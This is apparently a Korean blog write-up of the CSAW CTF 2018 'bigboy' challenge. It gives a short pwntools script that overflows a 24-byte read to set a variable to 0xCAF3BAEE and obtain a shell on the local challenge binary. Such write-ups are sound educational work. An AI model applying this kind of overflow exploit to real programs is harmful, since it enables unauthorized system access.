ii4gsp
CSAW CTF 2018 Quals - bigboy 본문
read()함수로 buf에 24byte만큼 입력을받는다.
v6가 0xCAF3BAEE 이면, 쉘을 획득한다.
from pwn import *
p = process('/home/ii4gsp/boi')
payload = ''
payload += '\x90' * 20
payload += p64(0xCAF3BAEE)
p.sendline(payload)
p.interactive()
간단
'시스템 해킹 > CTF' 카테고리의 다른 글
Angstrom CTF 2019 - Aquarium (0) | 2020.03.04 |
---|---|
CSAW CTF 2018 Quals - get_it? (0) | 2020.03.03 |
SSG_CTF - SimpleBOF (0) | 2020.02.25 |
[DEFCON 2015] r0pbaby (0) | 2020.02.20 |
[CODEGATE 2018] BaskinRobbins31 (0) | 2020.02.20 |
Comments